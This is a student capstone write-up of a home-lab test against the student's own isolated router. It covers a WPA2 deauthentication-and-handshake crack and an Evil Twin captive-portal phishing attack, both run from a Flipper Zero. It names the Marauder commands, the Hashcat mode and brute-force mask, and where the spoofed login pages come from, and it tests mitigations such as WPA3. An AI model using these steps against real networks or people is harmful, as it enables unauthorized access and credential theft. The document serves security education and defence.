Flipper Zero Wi-Fi Attack Analysis
WPA2 deauth + Evil Twin attacks with a $200 pocket device
01. Overview
This was my senior capstone project for the Bachelor of Computer Information Systems — Cybersecurity at the University of Akron. The goal was to prove, hands-on, that WPA2-Personal networks can be compromised with consumer hardware costing under $250 — no specialized lab equipment or Kali Linux setup required — and then verify that the recommended mitigations actually work against real attack tools.
Two independent attack vectors were demonstrated and compared: a cryptographic attack that captures and cracks the WPA2 4-way handshake, and a social engineering attack that bypasses encryption entirely by tricking users into handing over credentials through a spoofed captive portal. Both run on the same Flipper Zero with an ESP32 Wi-Fi Dev Board.
02. Lab Setup
| Component | Details |
|---|---|
| Attack device | Flipper Zero — Momentum firmware MNTM-011 |
| Wi-Fi module | ESP32 Wi-Fi Dev Board — Marauder firmware v1.10.2 (flashed via FzeeFlasher) |
| Target router | Netgear Nighthawk AX1800 R6700AX (isolated from primary network) |
| Target networks | 2.4 GHz: CM_Link / The_Nap · 5 GHz: CM_Link-5G |
| Cracking VM | Parrot Security OS (Security Edition) on Proxmox VE 9.1 |
| GPU passthrough | NVIDIA GeForce GTX 1650 via IOMMU/VFIO — ~185 kH/s on WPA mode 22000 |
| File transfer | qFlipper v1.3.3 + SCP to VM |
| Client devices | Researcher-owned iPhone and Windows desktop |
03. Attack Vector 1 — Deauthentication & Handshake Crack
How the attack works
The 802.11 deauthentication frame is unauthenticated by design. Any device within radio range can broadcast a deauth frame that forces a client to disconnect and immediately reconnect. That reconnection triggers the WPA2 4-way handshake, which an attacker can capture and take offline for cracking — completely without interacting with the target's password in real time.
Execution
On the Flipper Zero, the ESP32 Marauder app scanned for access points (scan ap),
targeted CM_Link, then ran sniff pmkid with deauth enabled.
Within seconds the display showed DEAUTH TX: TRUE and saved
sniffpmkid_0.pcap to the SD card. The file was pulled via
qFlipper and transferred to the Parrot OS VM over SCP.
On the VM, hcxpcapngtool converted the pcap to Hashcat format
22000. A wordlist attack with rockyou.txt at 167 H/s (CPU-only
on VirtualBox, ~21 hours estimated) was abandoned after migrating to Proxmox with GPU
passthrough, jumping to 185 kH/s. The test password 19002521
(8-digit numeric) wasn't in rockyou.txt, but a brute-force mask attack
(?d?d?d?d?d?d?d?d) cracked it in 1 minute 45 seconds.
Mitigations tested
- → WPA3-Personal: Switched the router to WPA3-Personal (SAE). hcxpcapngtool returned "no hashes written to hash files" — the attack path is completely eliminated. WPA3 SAE replaces the static PSK exchange with a forward-secret Dragonfly handshake that cannot be captured and cracked offline.
- → Strong passphrase: Changed the password to Sunshine@Home123 (17 characters, mixed). Brute-force immediately returned an integer overflow error on the keyspace — computationally infeasible. However, the wordlist attack recovered it in ~2 hours because it appeared in rockyou.txt. Lesson: length stops brute-force, but uniqueness stops dictionary attacks — you need both.
- → SSID broadcast disabled: Hiding the SSID removed CM_Link / The_Nap from the Marauder AP scan list entirely. Effective, but impractical for networks that frequently onboard new devices.
04. Attack Vector 2 — Evil Twin Captive Portal
How the attack works
Instead of breaking encryption, the Evil Twin attack exploits user trust in SSIDs. The Flipper broadcasts a rogue open access point with the same name as a nearby network. When a victim connects, the captive portal system on their device automatically opens a browser to whatever HTML page the attacker has loaded on the Flipper — a convincing login page for Apple, Starbucks, or a router admin panel. Credentials entered are logged directly on the Flipper Zero display.
Execution
Spoofed HTML login pages (Apple, Starbucks, TP-Link) were sourced from the open-source
FlipperZeroEuropeanPortals repository and uploaded to SD_Card/apps_data/evil_portal/html/
via qFlipper. The AP name was set to The_Nap to mirror the real network.
On a victim iPhone, the rogue AP appeared in the Wi-Fi list as an open/unsecured network
sitting alongside the real password-protected one. Connecting triggered the captive portal
immediately. After entering FakeEmail@gmail.com / Test123 on the
Apple ID page, the Flipper display instantly showed the captured credentials.
Mitigations observed
- → Duplicate SSID awareness: When named The_Nap, Windows showed two entries side by side — one with a lock icon (real), one without (rogue). A security-aware user would recognize that a network previously requiring a password should never appear as open.
- → Browser security warnings: Chrome displayed "Not Secure — 172.0.0.1" with the rogue AP's actual IP address in the address bar. The lock icon revealed an explicit warning against entering sensitive information. Any user who reads and acts on this warning is protected.
05. Results Comparison
| Metric | Deauth / Handshake | Evil Twin Portal |
|---|---|---|
| Setup time | ~5 min (scan, select, capture, transfer) | ~3 min (upload HTML, set AP name) |
| Technical barrier | Medium — requires VM + Hashcat knowledge | Low — point and click on Flipper |
| Password required | No — captures hash for offline cracking | No — social engineering bypass |
| Success rate | High for weak/short passwords; blocked by WPA3 | High against unaware users; reduced by browser warnings |
| Primary mitigation | WPA3-Personal eliminates the attack path entirely | User awareness + verifying the URL / SSID lock icon |
06. Lessons Learned
- → WPA3-Personal is the only mitigation that fully closes the deauthentication attack path. A strong password is not a substitute — it only raises the cost of cracking.
- → Password length stops brute-force but not dictionary attacks. A passphrase that appears in rockyou.txt (like Sunshine@Home123) will eventually be cracked regardless of length.
- → The Evil Twin attack has nothing to do with encryption strength — it bypasses it entirely. The only reliable defenses are user education and SSID awareness.
- → GPU acceleration is the practical dividing line for cracking. 167 H/s on CPU versus 185 kH/s on a GTX 1650 is a ~1,100× difference — the same gap separates "infeasible" from "minutes."
- → The ESP32's 2.4 GHz-only constraint means any client that prefers 5 GHz exclusively is out of range for the Marauder deauth. Dual-band networks with 5 GHz-preferred clients are meaningfully harder to target.
07. Future Directions
The natural extension is evaluating WPA3 transition mode versus strict mode across different router vendors — some transition-mode implementations may still expose WPA2 fallback paths. Comparing PMKID-only (clientless) capture against traditional EAPOL handshake capture would also be worth quantifying across hardware. Longer term, flipping to the defender's perspective and building a wireless intrusion detection layer for the homelab would complement these offensive findings directly.